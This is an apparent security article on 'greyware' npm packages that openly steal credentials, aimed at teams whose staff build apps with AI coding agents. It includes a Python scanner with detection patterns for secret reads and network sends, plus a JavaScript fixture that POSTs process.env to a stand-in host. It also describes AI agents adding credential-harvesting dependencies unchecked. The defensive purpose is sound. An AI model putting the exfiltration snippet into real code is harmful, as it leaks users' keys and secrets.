Greyware in 52,000 Packages: Rethink Open-Source Security

Your marketing team recently used an AI agent to build a customer analytics dashboard. The agent selected three npm packages that seemed perfect: one for tracking user behavior, one for exporting data to CSV, and one for sending email notifications. However, one of those packages also sent your API keys to an external server.

This is greyware, and it's changing the landscape of open-source security.

The Shift in Open-Source Security

Chainguard's source code scanner now analyzes over 100,000 packages daily, blocking more than 52,000 identified as malware or greyware. Unlike traditional malware that conceals its intent, greyware packages openly document their harmful functions. They harvest credentials, exfiltrate API keys, and establish persistent remote access, all while passing basic security scans because they don't hide their activities.

The catalyst: agentic development. AI coding assistants enable non-technical users to build applications by simply describing their needs. The AI agent searches package repositories, assembles dependencies, and generates working code. Your finance analyst can deploy a new reporting tool without understanding what require('helpful-analytics-sdk') actually does.

Key Findings

Traditional detection methods fall short. Signature-based scanners and behavioral analysis tools look for obfuscation or known attack vectors. Greyware packages document their credential harvesting in the README, listing "data synchronization with cloud services" as a feature. Your SAST tools flag nothing because there's no hidden payload.

Credential theft is a major threat. The packages Chainguard blocked were not installing backdoors or cryptominers. They systematically collected authentication tokens, database credentials, and cloud service keys, transmitting them to third-party servers as part of their "telemetry" or "analytics" features. Attackers seek persistent access to your infrastructure, not just a one-time payout.

The attack surface has expanded. When only developers wrote code, you could enforce package approval workflows. Now product managers, analysts, and operations teams can generate and deploy applications. They're not bypassing security controls maliciously; they're unaware of them. Unless you configure it to, the AI agent doesn't check your internal package registry or approved dependencies list.

Source code analysis is essential. Chainguard's approach examines the actual code in packages, not just metadata or compiled artifacts. Greyware authors don't hide their functionality; they rely on users not reading the source. A package that backs up your environment variables to a remote server will include that code in plain sight.
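To make "in plain sight" concrete, here is a minimal sketch of a source-level check. It is not Chainguard's scanner, whose internals this article doesn't describe. It assumes a crude heuristic: flag any file that both reads secrets and sends data over the network. The two regex patterns, the function names, and the sample package source are all hypothetical.

```python
import re

# Hypothetical heuristics, not a real detection ruleset.
# Places where JavaScript code commonly reads secrets.
SECRET_READ = re.compile(r"process\.env\b|\.aws/credentials|\.npmrc")
# Calls that commonly send data over the network.
NETWORK_SEND = re.compile(r"\bfetch\s*\(|\bhttps?\.request\s*\(|\baxios\.post\s*\(")


def find_exfiltration_signals(source: str) -> dict[str, list[int]]:
    """Return the 1-based line numbers where secrets are read and data is sent."""
    signals: dict[str, list[int]] = {"secret_reads": [], "network_sends": []}
    for lineno, line in enumerate(source.splitlines(), start=1):
        if SECRET_READ.search(line):
            signals["secret_reads"].append(lineno)
        if NETWORK_SEND.search(line):
            signals["network_sends"].append(lineno)
    return signals


def looks_like_greyware(source: str) -> bool:
    """Flag a file only when it both reads secrets and makes network calls."""
    signals = find_exfiltration_signals(source)
    return bool(signals["secret_reads"] and signals["network_sends"])


# Hypothetical package source: an unobfuscated "settings sync" feature.
SAMPLE = """\
const https = require('https');
function syncSettings() {
  const payload = JSON.stringify(process.env);
  const req = https.request({ host: 'telemetry.example.invalid', method: 'POST' });
  req.write(payload);
  req.end();
}
"""

print(find_exfiltration_signals(SAMPLE))
print(looks_like_greyware(SAMPLE))
```

A co-occurrence check like this will produce false positives, since plenty of legitimate packages read configuration from the environment and make network calls. Treat it as a way to route packages to human review, not as a verdict.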

Implications for Your Team

Your current dependency management strategy assumes malicious packages will try to hide. Greyware doesn't. The next supply chain incident will likely come from a package that clearly states it collects and transmits data, in documentation your AI agent never showed to the person who approved the dependency.

Training every employee on secure coding isn't feasible. The point of agentic development is that non-technical users don't need to understand code. Telling your marketing team to "vet dependencies carefully" is like asking them to audit assembly code.

Your current tools may not help. If you're using Snyk, Dependabot, or similar tools, they primarily check dependencies against known CVEs and malware signatures. They don't read package source code to identify documented features that amount to credential exfiltration.

Action Items by Priority

Immediate: Inventory code deployment capabilities. Identify who can deploy code in your environment. This includes anyone using AI coding assistants, no-code platforms, or internal developer portals. You need to know the scope before you can control it.

This quarter: Implement source-level package scanning. Your pipeline needs to examine the actual code in dependencies, not just check them against vulnerability databases. If you're in the npm ecosystem, Chainguard's scanner targets this problem. For other ecosystems, use tooling that performs static analysis on third-party code and flags data exfiltration patterns.

Ongoing: Create an allowlist. Reactive scanning that blocks known-bad packages won't scale when non-technical users can add hundreds of dependencies through AI agents. Build an approved package registry and configure your AI tools to only pull from it. This creates necessary friction between "I need a CSV export library" and "I just deployed credential harvesting to production."
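As a rough illustration of the allowlist gate, the sketch below compares the dependencies declared in a package.json against an approved set and reports anything outside it. The function name, the approved package names, and the sample manifest are hypothetical. It only checks direct dependencies by name, so a real gate would also need to cover transitive dependencies (for example, from the lockfile) and pin versions.

```python
import json

# Sections of package.json that declare installable dependencies.
DEPENDENCY_SECTIONS = ("dependencies", "devDependencies", "optionalDependencies")


def unapproved_dependencies(package_json_text: str, allowlist: set[str]) -> list[str]:
    """Return the sorted names of declared dependencies that are not on the allowlist."""
    manifest = json.loads(package_json_text)
    declared: set[str] = set()
    for section in DEPENDENCY_SECTIONS:
        # A missing or null section contributes nothing.
        declared.update(manifest.get(section) or {})
    return sorted(declared - allowlist)


# Hypothetical approved set and an AI-generated manifest.
APPROVED = {"approved-csv-export", "approved-mailer"}
MANIFEST = """
{
  "name": "customer-analytics-dashboard",
  "dependencies": {
    "approved-csv-export": "^2.1.0",
    "approved-mailer": "^6.9.0",
    "helpful-analytics-sdk": "^1.0.3"
  }
}
"""

violations = unapproved_dependencies(MANIFEST, APPROVED)
if violations:
    print("Blocked, not on the allowlist:", ", ".join(violations))
```

Running a check like this in CI catches unapproved packages after the fact. Pointing npm's registry setting at an internal registry that hosts only approved packages moves the same control earlier, to install time.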

Strategic: Treat AI-generated code as untrusted input. Update your threat model to include "well-meaning employee using AI agent" as an attack vector. Apply the same controls you'd use for external contractors: sandboxed execution environments, limited credential scope, and mandatory code review before production deployment. The AI agent shouldn't get production database credentials just because a trusted employee is using it.
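One way to approximate "limited credential scope" is to launch AI-generated code with a scrubbed environment, so a dependency that dumps environment variables finds nothing worth stealing. The sketch below assumes secrets reach the process through environment variables. The list of safe keys, the function names, and the REPORT_API_TOKEN variable are hypothetical, and this is environment scoping only, not a full sandbox: it does nothing about filesystem or network access.

```python
import os
import subprocess
from typing import Mapping, Optional, Sequence

# Hypothetical set of variables considered safe to inherit.
# Some platforms need more (for example, SYSTEMROOT on Windows).
SAFE_ENV_KEYS = {"PATH", "HOME", "LANG", "TMPDIR"}


def scoped_env(
    parent_env: Mapping[str, str],
    extra: Optional[Mapping[str, str]] = None,
) -> dict[str, str]:
    """Build a child environment from safe keys plus explicitly granted values."""
    env = {key: value for key, value in parent_env.items() if key in SAFE_ENV_KEYS}
    env.update(extra or {})
    return env


def run_untrusted(
    cmd: Sequence[str],
    extra_env: Optional[Mapping[str, str]] = None,
    timeout: float = 60.0,
) -> subprocess.CompletedProcess:
    """Run a command without inheriting the parent's credentials."""
    return subprocess.run(
        list(cmd),
        env=scoped_env(os.environ, extra_env),
        capture_output=True,
        text=True,
        timeout=timeout,
        check=False,
    )


# Illustration: production secrets in the parent never reach the child.
parent = {
    "PATH": "/usr/bin",
    "DATABASE_URL": "postgres://prod.example.invalid/main",
    "AWS_SECRET_ACCESS_KEY": "not-a-real-key",
}
print(scoped_env(parent, {"REPORT_API_TOKEN": "read-only-token"}))
```

The design choice here is to allow by default nothing: the child process gets only what you name, so a newly added secret in the parent environment is never exposed by accident.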

Compliance alignment: Map to existing frameworks. If you're under PCI DSS v4.0.1, this falls under Requirement 6.3.2, which calls for an inventory of bespoke and custom software, including the third-party components incorporated into it. SOC 2 Type II audits examine your change management controls over the production environment, which extends to dependencies added by AI agents. Document how you're controlling this attack surface for your next audit.
